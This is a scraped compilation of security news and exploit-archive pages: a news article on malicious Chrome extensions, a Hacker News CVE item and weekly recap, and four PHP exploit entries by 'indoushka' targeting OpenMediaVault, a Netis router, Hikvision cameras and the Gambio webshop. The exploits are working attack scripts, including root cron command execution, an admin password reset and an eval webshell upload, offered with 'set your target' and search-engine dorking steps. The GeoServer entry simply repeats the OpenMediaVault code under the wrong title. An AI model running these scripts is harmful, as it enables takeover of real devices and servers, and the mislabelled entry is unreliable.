Google's Manifest V3 offers better privacy and security controls for browser extensions than the previous M2, but too many lax permissions and gaps remain.

Source: QubixStudio via Shutterstock

Malicious browser extensions are bypassing Google's latest security and privacy standard for Chrome extensions, and they are finding their way into the Chrome Web Store — putting organizations and individuals at considerable risk.

That's according to researchers at Singapore-based SquareX, who recently demonstrated how bad actors could sneak harmful browser add-ons past the protections in Google's latest Manifest V3 update for Chrome extensions.

**Malicious Chrome Extensions Are a Continuing Problem**

In a presentation at DefCon 32, the researchers showed how such extensions could steal live video feeds from platforms like Google Meet and Zoom without requiring any special permissions. They then demonstrated how attackers could use extensions based on the Manifest V3 standard to redirect users to credential-stealing pages, add collaborators to private GitHub repos, and steal site cookies, browsing history, and other user data relatively easily.

Google introduced Manifest V3 in 2018 to address issues in the previous Manifest V2 standard, which more easily allowed bad actors to craft Chrome extensions with a range of malicious capabilities. A study by researchers at Stanford University concluded that there were a staggering 280 million installs of such malicious Chrome extensions between July 2020 and February 2023.

Related:Dark Reading Confidential: The CISO and the SEC

As Google explains it, Manifest V3 is part of a broader effort by the company to "improve the privacy, security, and performance of extensions." Improvements in Manifest V3 include a stricter content security policy, updated and more secure APIs, more granular permission control for users, and changes to how extensions can make cross-origin requests. Some of the updates, like one that changes how Chrome handles content-blocking extensions, have been controversial. Privacy advocates and makers of ad-blocking extensions have described the feature as drastically curtailing the ability for Chrome users to block ads and tracking mechanisms. But overall, the goal with Manifest V3 is improved security and privacy controls around Chrome extensions.

The ground reality is somewhat different, says Vivek Ramachandran, CEO and founder of SquareX. "\[Manifest V3's\] permission model remains too broad, allowing malicious actors to exploit minimal permissions to steal data," he says.

**Overly Broad Permissions for Manifest V3?**

A key example is host permissions that allow an extension to modify or read any Web content on visited pages. "SquareX demonstrated a Google Meet stream-stealing extension that only required host permission," Ramachandran says. "This type of permission is very common in the extension store. In fact, many extensions, like grammar checkers, rely on it."

Related:Mideast, Turkey Cyber Threats Spike, Prompting Defense Changes

Ramachandran estimates there are already hundreds if not thousands of malicious browser extensions based on Manifest V3 that are already in the Chrome Web Store. He expects that number to increase dramatically as more extensions cut over to Manifest V3.

"Google needs to enforce stricter security controls in MV3," Ramachandran says. "They should collaborate with the Web and security community to develop a more robust permission model that is less broad. Additionally, Google should improve the vetting process for extensions and introduce tools to monitor real-time behavior."

Google did not immediately respond to a Dark Reading request for comment on SquareX's research. But the Internet giant previously has conceded that with more than 250,000 browser extensions in Chrome Web Store, there are chances some extensions could pose risks to users and sometimes request permissions that might violate a company's policies.  

"As with any software, extensions can also introduce risk," Google said in a blog post shortly after the Stanford researchers released their paper on risky extensions in the Chrome Web Store.

Related:Salt Typhoon APT Subverts Law Enforcement Wiretapping: Report

**Boosting Chrome Ecosystem Security**

In that blog post and in previous updates, like this one in April 2023, Google has highlighted its efforts to bolster security around Chrome extensions. These include browser extension management capabilities that security teams can use to view and set policies for all installed extensions in their environment, and the ability to review extensions before users can install them.

Chrome security features also include one that alerts admins when a user might install a new browser extension, to make tracking and management easier. And last year, Google introduced two risk assessment tools — CRXcavator and Spin.AI Risk Assessment — that give enterprise admins a way to assess and score extensions for risk.

Google also points to its Chrome extensions page (chrome://extensions/) as a resource that individuals can use to see if their installed extensions pose a security risk; a warning panel appears on the page if Google detects any installed extensions as being suspicious. That definition includes: browsers suspected of containing malware; browsers that violate Chrome Web Store polices; unpublished — and therefore no longer supported extensions; and extensions that are not explicit about their privacy and data-collection practices.

Google had set a deadline of this past June for browser extension makers to migrate to Manifest V3 and has noted that it would also begin disabling Manifest V2 extensions in its pre-stable versions of Chrome at that time. The company has given enterprise organizations until June 2025 to migrate Manifest V2 extensions to the new version. As of Oct. 4, 60.4% of all Chrome browser extension have migrated to Manifest V3.

Ramachandran says enterprises should audit installed extensions and limit their permissions. His advice is that organizations also enable better visibility and control over extensions in the environment. Think of browsers like Chrome as complex platforms, much like operating systems, he suggests.

"Extensions run as internal applications, but endpoint security tools only have visibility at the process level," Ramachandran says. "They cannot assess or control what browser extensions are doing internally."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Malicious Chrome Extensions Skate Past Google's Updated Security

OpenMediaVault version 7.4.2-2 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : OpenMediaVault 7.4.2-2 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.openmediavault.org/                                                                                             |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+]  uses the CURL library for sending HTTP requests and handles JSON parsing for interaction with the OpenMediaVault API.[+] Line 148 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

OpenMediaVault 7.4.2-2 Code Injection

Netis MW5360 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Netis MW5360 Code Injection Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.netis-systems.com/products/MW5360.html                                                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 67 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass NetisRouterExploit {    private $targetUri;    private $cmdDelay;    public function __construct($targetUri = '/', $cmdDelay = 30) {        $this->targetUri = $targetUri;        $this->cmdDelay = $cmdDelay;    }    public function executeCommand($cmd) {        // Clean up payload file if command includes chmod        if (strpos($cmd, 'chmod +x') !== false) {            $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));        }        // Skip command removal for payload cleanup        if (strpos($cmd, 'rm -f') === false) {            $payload = base64_encode("`$cmd`");            echo "Executing $cmd\n";            $this->sendRequest('/cgi-bin/skk_set.cgi', [                'password' => $payload,                'quick_set' => 'ap',                'app' => 'wan_set_shortcut'            ]);        }    }    public function check() {        echo "Checking if target can be exploited.\n";        $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [            'mode_name' => 'skk_get',            'wl_link' => 0        ]);        if ($res === false || strpos($res['body'], 'version') === false) {            return "Unknown: No valid response received from target.";        }        preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);        if (isset($matches[2])) {            $version_number = strtoupper(trim(explode('-V', $matches[2])[1]));            $model_number = strtoupper(trim(explode('-V', $matches[2])[0]));            if (strpos($model_number, '-') !== false) {                $model_number = trim(explode('-', $model_number)[1]);            } else {                $model_number = trim(explode('(', $model_number)[1]);            }            if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {                return "Appears: Version " . $matches[2];            }            return "Safe: Version " . $matches[2];        }        return "Safe";    }    public function exploit() {        echo "Executing exploit with payload.\n";        $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);    }    private function sendRequest($uri, $postData) {        $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP        $options = [            'http' => [                'header'  => "Content-type: application/x-www-form-urlencoded\r\n",                'method'  => 'POST',                'content' => http_build_query($postData),            ],        ];        $context  = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === FALSE) {            return false;        }        return ['body' => $result];    }    private function registerFilesForCleanup($filename) {        echo "Registering $filename for cleanup.\n";        // Logic to clean up the file after execution.    }    private function executeCmdStager($options) {        echo "Executing command stager with options: " . print_r($options, true) . "\n";        // Implement the command stager logic here    }}// Usage$exploit = new NetisRouterExploit('/');$exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Netis MW5360 Code Injection

Hikvision IP Cameras suffer from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Hikvision IP Camera CSRF Add ADmin Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.hikvision.com/                                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The vulnerability has been present in Hikvision products since 2014.[+] add new admin.[+] Line 104 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass HikvisionExploit {    private $target;    private $port;    private $username;    private $password;    private $id;    private $storeCred;    public function __construct($target, $port = 80, $username = 'admin', $password = 'Pa$$W0rd', $id = 1, $storeCred = true) {        $this->target = $target;        $this->port = $port;        $this->username = $username;        $this->password = $password;        $this->id = $id;        $this->storeCred = $storeCred;    }    public function check() {        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('GET', $url);        if (!$response) {            return 'No response received from the target!';        }        if ($response['http_code'] == 200) {            echo "Following users are available for password reset...\n";            $xml = simplexml_load_string($response['body']);            foreach ($xml->User as $user) {                echo "USERNAME: " . $user->userName . " | ID: " . $user->id . " | ROLE: " . $user->userLevel . "\n";            }            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit() {        if ($this->check() !== 'Vulnerable') {            return false;        }        echo "Starting the password reset for {$this->username}...\n";        $postData = "<User version=\"1.0\" xmlns=\"http://www.hikvision.com/ver10/XMLSchema\">\r\n" .            "<id>{$this->id}</id>\r\n" .            "<userName>{$this->username}</userName>\r\n" .            "<password>{$this->password}</password>\r\n</User>";        $auth = base64_encode("admin:" . $this->generateRandomPassword());        $url = "http://{$this->target}:{$this->port}/Security/users?auth=" . urlencode($auth);        $response = $this->sendRequest('PUT', $url, $postData, 'application/xml');        if (!$response) {            echo "Target server did not respond to the password reset request\n";            return false;        }        if ($response['http_code'] == 200) {            echo "Password reset for {$this->username} was successfully completed!\n";            echo "Please log in with your new password: {$this->password}\n";            if ($this->storeCred) {                $this->reportCreds();            }        } else {            echo "Unknown Error. Password reset was not successful!\n";        }    }    private function sendRequest($method, $url, $data = null, $contentType = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if ($contentType) {            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: $contentType"]);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['http_code' => $http_code, 'body' => $response];    }    private function generateRandomPassword($length = 10) {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, $length);    }    private function reportCreds() {        // In a real implementation, you could store the credentials into a database        echo "Credentials for {$this->username} were added to the database...\n";    }}// Example usage$exploit = new HikvisionExploit('target-ip');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Hikvision IP Camera Cross Site Request Forgery

GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/geoserver/                                                                                               |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123  set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GeoServer 2.25.1 Code Injection

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gambio.com/                                                                                                     |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit {    private $targetUrl;    private $webshellName;    private $postParam;    private $getParam;    private $phpCmdFunction;    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {        $this->targetUrl = $targetUrl;        $this->phpCmdFunction = $phpCmdFunction;        $this->webshellName = $webshellName ?: $this->randomString() . '.php';        $this->postParam = $this->randomString();        $this->getParam = $this->randomString();    }    // Random string generator    private function randomString($length = 8) {        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    // Function to send HTTP POST request    private function sendPostRequest($uri, $data) {        $url = $this->targetUrl . $uri;        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => http_build_query($data),            ],        ];        $context = stream_context_create($options);        return file_get_contents($url, false, $context);    }    // Upload webshell to target    public function uploadWebshell() {        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $finalPayload = base64_encode(serialize([            "GuzzleHttp\\Cookie\\FileCookieJar" => [                "cookies" => [                    "GuzzleHttp\\Cookie\\SetCookie" => [                        "data" => [                            "Value" => $phpPayload,                            "Domain" => "target.com",                            "Path" => "/",                        ]                    ]                ],                "filename" => $this->webshellName            ]        ]));        $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [            'checkout_started' => 0,            'search' => $finalPayload,            'firstname' => 'test',            'lastname' => 'test',        ]);        echo "Webshell uploaded to: {$this->webshellName}\n";    }    // Execute PHP payload    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}", [            $this->postParam => $payload        ]);        echo "Executed command via webshell: {$cmd}\n";    }    // Execute command    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [            $this->postParam => $payload        ]);        echo "Executed command: {$cmd}\n";    }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gambio Online Webshop 4.9.2.0 Code Injection

A critical security flaw has been disclosed in the Apache Avro Java Software Development Kit (SDK) that, if successfully exploited, could allow the execution of arbitrary code on susceptible instances.
The flaw, tracked as CVE-2024-47561, impacts all versions of the software prior to 1.11.4.
"Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute

Open Source / Software Security

A critical security flaw has been disclosed in the Apache Avro Java Software Development Kit (SDK) that, if successfully exploited, could allow the execution of arbitrary code on susceptible instances.

The flaw, tracked as **CVE-2024-47561**, impacts all versions of the software prior to 1.11.4.

"Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code," the project maintainers said in an advisory released last week. "Users are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue."

Apache Avro, analogous to Google's Protocol Buffers (protobuf), is an open-source project that provides a language-neutral data serialization framework for large-scale data processing.

The Avro team notes that the vulnerability affects any application if it allows users to provide their own Avro schemas for parsing. Kostya Kortchinsky from the Databricks security team has been credited with discovering and reporting the security shortcoming.

As mitigations, it's recommended to sanitize schemas before parsing them and avoid parsing user-provided schemas.

"CVE-2024-47561 affects Apache Avro 1.11.3 and previous versions while de-serializing input received via avroAvro schema," Mayuresh Dani, Manager, manager of threat research at Qualys, said in a statement shared with The Hacker News.

"Processing such input from a threat actor leads to execution of code. Based on our threat intelligence reporting, no PoC is publicly available, but this vulnerability exists while processing packages via ReflectData and SpecificData directives and can also be exploited via Kafka."

"Since Apache Avro is an open-source project, it is used by many organizations. Based on publicly available data, a majority of these organizations are located in the US. This definitely has a lot of security implications if left unpatched, unsupervised and unprotected."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Apache Avro SDK Flaw Allows Remote Code Execution in Java Applications

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.
Get the scoop before it's too late!
⚡ Threat of the Week
Double Trouble: Evil Corp & LockBit Fall: A consortium of international law enforcement agencies took steps to arrest four

Cybersecurity / Weekly Recap

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.

Get the scoop before it's too late!

****⚡ Threat of the Week****

**Double Trouble: Evil Corp & LockBit Fall:** A consortium of international law enforcement agencies took steps to arrest four people and take down nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation. In tandem, authorities outed a Russian national named Aleksandr Ryzhenkov, who was one of the high-ranking members of the Evil Corp cybercrime group and also a LockBit affiliate. A total of 16 individuals who were part of Evil Corp have been sanctioned by the U.K.

  
****🔔 Top News****

*   **DoJ & Microsoft Seize 100+ Russian Hacker Domains:** The U.S. Department of Justice (DoJ) and Microsoft announced the seizure of 107 internet domains used by a Russian state-sponsored threat actor called COLDRIVER to orchestrate credential harvesting campaigns targeting NGOs and think tanks that support government employees and military and intelligence officials.
*   **Record-Breaking 3.8 Tbps DDoS Attack:** Cloudflare revealed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at 3.8 terabits per second (Tbps) and lasted 65 seconds. The attack is part of a broader wave of over a hundred hyper-volumetric L3/4 DDoS attacks that have been ongoing since early September 2024 targeting financial services, Internet, and telecommunication industries. The activity has not been attributed to any specific threat actor.
*   **North Korean Hackers Deploy New VeilShell Trojan:** A North Korea-linked threat actor called APT37 has been attributed as behind a stealthy campaign targeting Cambodia and likely other Southeast Asian countries that deliver a previously undocumented backdoor and remote access trojan (RAT) called VeilShell. The malware is suspected to be distributed via spear-phishing emails.
*   **Fake Trading Apps on Apple and Google Stores:** A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims as part of what's called a pig butchering scam. The apps are no longer available for download. The campaign has been found to target users across Asia-Pacific, Europe, Middle East, and Africa. In a related development, Gizmodo reported that Truth Social users have lost hundreds of thousands of dollars to pig butchering scams.
*   **700,000+ DrayTek Routers Vulnerable to Remote Attacks:** As many as 14 security flaws, dubbed DRAY:BREAK, have been uncovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices. The vulnerabilities have been patched following responsible disclosure.

****📰 Around the Cyber World****

*   **Salt Typhoon Breached AT&T, Verizon, and Lumen Networks:** A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. "The hackers appear to have engaged in a vast collection of internet traffic from internet service providers that count businesses large and small, and millions of Americans, as their customers."
*   **U.K. and U.S. Warn of Iranian Spear-Phishing Activity:** Cyber actors working on behalf of the Iranian Government's Islamic Revolutionary Guard Corps (IRGC) have targeted individuals with a nexus to Iranian and Middle Eastern affairs to gain unauthorized access to their personal and business accounts using social engineering techniques, either via email or messaging platforms. "The actors often attempt to build rapport before soliciting victims to access a document via a hyperlink, which redirects victims to a false email account login page for the purpose of capturing credentials," the agencies said in an advisory. "Victims may be prompted to input two-factor authentication codes, provide them via a messaging application, or interact with phone notifications to permit access to the cyber actors."
*   **NIST NVD Backlog Crisis - 18,000+ CVEs Unanalyzed:** A new analysis has revealed that the National Institute of Standards and Technology (NIST), the U.S. government standards body, has still a long way to go in terms of analyzing newly published CVEs. As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)." It's worth noting that a total of 25,357 new vulnerabilities have been added to NVD since February 12, 2024, when NIST scaled back its processing and enrichment of new vulnerabilities.
*   **Major RPKI Flaws Uncovered in BGP's Cryptographic Defense:** A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges." These vulnerabilities range from denial-of-service and authentication bypass to cache poisoning and remote code execution.
*   **Telegram's Data Policy Shift Pushes Cybercriminals to Alternative Apps:** Telegram's recent decision to give users' IP addresses and phone numbers to authorities in response to valid legal requests is prompting cybercrime groups to seek other alternatives to the messaging app, including Jabber, Tox, Matrix, Signal, and Session. The Bl00dy ransomware gang has declared that it's "quitting Telegram," while hacktivist groups like Al Ahad, Moroccan Cyber Aliens, and RipperSec have expressed an intent to move to Signal and Discord. That said, neither Signal nor Session support bot functionality or APIs like Telegram nor do they have extensive group messaging capabilities. Jabber and Tox, on the other hand, have already been used by adversaries operating on underground forums. "Telegram's expansive global user base still provides extensive reach, which is crucial for cybercriminal activities such as disseminating information, recruiting associates or selling illicit goods and services," Intel 471 said. Telegram CEO Pavel Durov, however, has downplayed the changes, stating "little has changed" and that it has been sharing data with law enforcement since 2018 in response to valid legal requests. "For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3," Durov added.

**🔥 **Cybersecurity Resources & Insights****

*   **LIVE Webinars**
    *   **Modernization of Authentication: Passwords vs Passwordless and MFA:** Are you sure your passwords are enough? Discover the truth about passwordless tech and how MFA can protect you in ways you didn't even know you needed. Join our webinar to get ahead of the next big shift in cybersecurity.
*   **Ask the Expert**
    *   **Q: How can organizations reduce compliance costs while strengthening their security measures?**
    *   **A:** You can reduce compliance costs while strengthening security by smartly integrating modern tech and frameworks. Start by adopting unified security models like NIST CSF or ISO 27001 to cover multiple compliance needs, making audits easier. Focus on high-risk areas using methods like FAIR so your efforts tackle the most critical threats. Automate compliance checks with tools like Splunk or IBM QRadar, and use AI for faster threat detection. Consolidate your security tools into platforms like Microsoft 365 Defender to save on licenses and simplify management. Using cloud services with built-in compliance from providers like AWS or Azure can also cut infrastructure costs. Boost your team's security awareness with interactive training platforms to build a culture that avoids mistakes. Automate compliance reporting using ServiceNow GRC to make documentation easy. Implement Zero Trust strategies like micro-segmentation and continuous identity verification to strengthen defenses. Keep an eye on your systems with tools like Tenable.io to find and fix vulnerabilities early. By following these steps, you can save on compliance expenses while keeping your security strong.
*   **Cybersecurity Tools**
